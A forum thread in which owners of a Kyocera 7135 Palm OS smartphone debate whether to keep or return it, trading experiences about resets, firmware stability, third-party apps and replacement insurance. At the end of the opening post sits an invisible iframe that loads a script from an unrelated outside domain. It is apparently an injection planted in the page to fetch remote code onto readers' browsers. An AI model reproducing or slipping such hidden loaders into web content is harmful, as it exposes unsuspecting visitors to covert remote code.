+ Reply to Thread

Keep my 7135 or return it. Final day to decide.

Tomorrow is my final day to return the 7135 for a full refund. I'm really torn about what to do. I love the phone, I can live with it's old Palm OS and low res screen, but my REAL ISSUE is reliability. Though I haven't had to do a hard reset or had too many other major issues YET ... it looks like so, so, so, so many people have had MAJOR ISSUES inluding reverse or black screen of death, hard resets, having to retunr their brtand new phone for a refurbished one ... etc.

I'm really nervous about committing to two years with what is clearly a very unstable combination of hardware and software. This is my only issue. I know that no one here can decide for me, I'm just voicing my concerns. I wonder how many people here who have passed their two week return policy, now regret it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I hear ya! Its alot of money to invest in something that may die out of nowhere.

Im less than a week into my new phone, and I think it is the neatest thing around. But like yourself, this reliability has me scared.

Unless my majorly phone craps out in the next week, I think Im going to keep it...I just cant believe how much more organized I am with it (and I have sim city to play when Im bored somewhere!).
    "Why all the pearls, why the blue hair, why anything!?"

Keep in mind that it is the people with the problems that tend to do most of the posting in search of solutions. While I have had a few problems, the truth is that if I don't keep adding and removing apps, the phone is stable. There are occasional soft resets, but no more than I had with my Palm Vx when I used it extensively. I have not had to do a hard reset (except for my own purposes) since the first week or so of screwing around with the phone after I got it in January. Since then I have travelled with it, loaded up a bunch of apps, used it as a modem and used it as my regular cell phone. Overall, I am very happy and would not give it up. Is it less stable than my old StarTac? Absolutely. But that is comparing apples and aardvarks.

I've had mine for about four weeks and sent it back for a replacement yesterday. In the meantime, I've reactivated my 6035, which of course works flawlessly. If I were you, I'd return it and buy another one when they fix the reliability. I don't have that option; buying direct from Kyocera had a 5 day return window.

GWW

Re: Keep my 7135 or return it. Final day to decide.

Originally posted by Jeremy
    Tomorrow is my final day to return the 7135 for a full refund. I'm really torn about what to do. I love the phone, I can live with it's old Palm OS and low res screen, but my REAL ISSUE is reliability. Though I haven't had to do a hard reset or had too many other major issues YET ... it looks like so, so, so, so many people have had MAJOR ISSUES inluding reverse or black screen of death, hard resets, having to retunr their brtand new phone for a refurbished one ... etc.

I'm really nervous about committing to two years with what is clearly a very unstable combination of hardware and software. This is my only issue. I know that no one here can decide for me, I'm just voicing my concerns. I wonder how many people here who have passed their two week return policy, now regret it.
    Keeping mine. No problems here

Fully Converged
    I'm definitely keeping my 7135; in fact I sold my 6035 already!

BTW, my Verizon Account rep put the replacement insurance on the 7135, for the usual $4.95/month so if something goes wrong, I'll just have it replaced as I did with the 6035 ($25 deductible is no biggie for an investment this big, IMHO).

Whatever you decide, I'm sure, will be the right choice for you!
    From the Middle of the Sea ;-)

Originally posted by Lnoble
    Keep in mind that it is the people with the problems that tend to do most of the posting in search of solutions. While I have had a few problems, the truth is that if I don't keep adding and removing apps, the phone is stable. There are occasional soft resets, but no more than I had with my Palm Vx when I used it extensively. I have not had to do a hard reset (except for my own purposes) since the first week or so of screwing around with the phone after I got it in January. Since then I have travelled with it, loaded up a bunch of apps, used it as a modem and used it as my regular cell phone. Overall, I am very happy and would not give it up. Is it less stable than my old StarTac? Absolutely. But that is comparing apples and aardvarks.
    I'll add to that. Its similar to asking if the Palm Vx is stable or a Dell PC. A *lot* of the problems are due to 3rd party apps and system hacks that people are using. You can make your PC really unstable by installing buggy software. I've only heard of possibly 1 or 2 bugs in the phone as it comes out of the box (I certainly haven't read everything). Given that, it may well be as stable as my old StarTac (I had to re-boot that thing once or twice -- turn it off and back on).

-Quick

Originally posted by joekonaiii
    ($25 deductible is no biggie for an investment this big, IMHO).
    Should be $50.00 now, no?

Originally posted by Quick
    ... I've only heard of possibly 1 or 2 bugs in the phone as it comes out of the box ...

-Quick
    These posts are encouraging me to hang on to it, I must say. Thanks everybody. What are the bugs in the phone as it comes out of the box?

Originally posted by Quick
    I'll add to that. Its similar to asking if the Palm Vx is stable or a Dell PC. A *lot* of the problems are due to 3rd party apps and system hacks that people are using. You can make your PC really unstable by installing buggy software. I've only heard of possibly 1 or 2 bugs in the phone as it comes out of the box (I certainly haven't read everything). Given that, it may well be as stable as my old StarTac (I had to re-boot that thing once or twice -- turn it off and back on).

-Quick
    Quick,

I can't really agree with this. I bought the 6035 when it _first_ came out, and probably had 2 soft resets in the 2 years I had the phone. It was simply rock solid and stable.

I have never been through an entire day with the 7135 without a lockup (RSD on older firmware and Fatal Exception on newer). But the most concerning thing to me is that the newer firmware seems to be less stable than the older original Alltel firmware. I have never used any "hacks" on either phone.

I sent one phone back already (that one was having hard resets problems), both phones have had contrast problems which Kyocera admints to not having a fix for.

All in all, pretty pathetic. Having said that, I still wouldn't trade the phone for anything else, but you certainly have to be pretty tolerant to use this phone day to day.

Frankly, I am amazed that Verizon released it.

Glenn

I'd go the 1st 30 days without adding stuff . . .

I've owned the 7135 for a week now. I'd wait at least 30 days before you download programs that didn't come on the CD other than to a SD/MMC card. This way you can isolate a problem that may be with the phone. I've found on my past 3 Palms and the 6035 the addition of hacks and third party software always caused my units to become unstable at some point.

Also, if you were a previous Plam user and you didn't delete the "saved preferences" file before you hot synced the first time (I did at my home, but not my office) and kept your user name the same, you are bound to see unstability issues at some point (see page 61 of user guide) because hotsync does not do well syncing to two different Palm devices with the same user name.

I jumped the gun . . . and wondered how I had all my old apps on the 7135. Several days later whenever I opened Space Invaders as soon as I pressed the right hard button it went into fatal reset along with other errors in other apps.

So before you give up, start fresh by deleting the "saved pref" file resyncing and don't screw around with all the phones settings for a few weeks until you are sure the unit has no defects.
    Good Luck

Re: I'd go the 1st 30 days without adding stuff . . .

Originally posted by Expidia
    I've owned the 7135 for a week now. I'd wait at least 30 days before you download programs that didn't come on the CD other than to a SD/MMC card. This way you can isolate a problem that may be with the phone. I've found on my past 3 Palms and the 6035 the addition of hacks and third party software always caused my units to become unstable at some point.

Also, if you were a previous Plam user and you didn't delete the "saved preferences" file before you hot synced the first time (I did at my home, but not my office) and kept your user name the same, you are bound to see unstability issues at some point (see page 61 of user guide) because hotsync does not do well syncing to two different Palm devices with the same user name.

I jumped the gun . . . and wondered how I had all my old apps on the 7135. Several days later whenever I opened Space Invaders as soon as I pressed the right hard button it went into fatal reset along with other errors in other apps.

So before you give up, start fresh by deleting the "saved pref" file resyncing and don't screw around with all the phones settings for a few weeks until you are sure the unit has no defects.
    Good Luck
    That's a good idea, but it's too late, since my 15 day return expires tomorrow. I had no previous Palm software installed. I sold my Tungsten and uninstalled EVERYTHING to do with the Palm from my PC, including all conduit managers and desktop apps for the Palm. I Even did a manual delete of the Palm folder in programs and deleted all Palm software registry entries BEFORE installing the 7135 software from the CD.

As I said previously, I have had very few issues with the phone, just a couple of soft resets. My concern is what may happen in the future, since so many of the reported problems on this forum seem to appear suddenly after weeks or months of no problems at all. I'm just concerned there's a high chance I may be buying into inevitable issues down the road and have to end up replacing my phone for a refurbished one, which I would be extremely unhappy about. It's a tough call. (pun intended!)

To a degree you will have "what might happen in the future" issues with any device, especially one that tries to accomplish as many tasks as this one. The possibility of what could go wrong stresses the importance of backup buddy and hot-syncing. Look at it this way, what if you had a cell phone without a backup feature on it. If something should happen...its adios to everything. I can tell you I have had that happen, as I am sure others have, and its a bad bad thing. Something else to consider...with resources like this site available, think about how much better equipped you are to handle something unforeseen. IMO...keep the phone, its worth the risk, just be diligent about CYA.

Jax

Administrator
    the 7135 is just as stable as any other new phone on the market, but it can become unstable with a lot of 3rd party hacks and programs. its human nature to get this thing and load it up with everything you can find, but just use the phone bare bones for a while to get used to its basic functionality. once you have aced that, then start to move onto other programs.

in short, keep the phone, you will love it.. but i cant speak for verizon... :Smoke: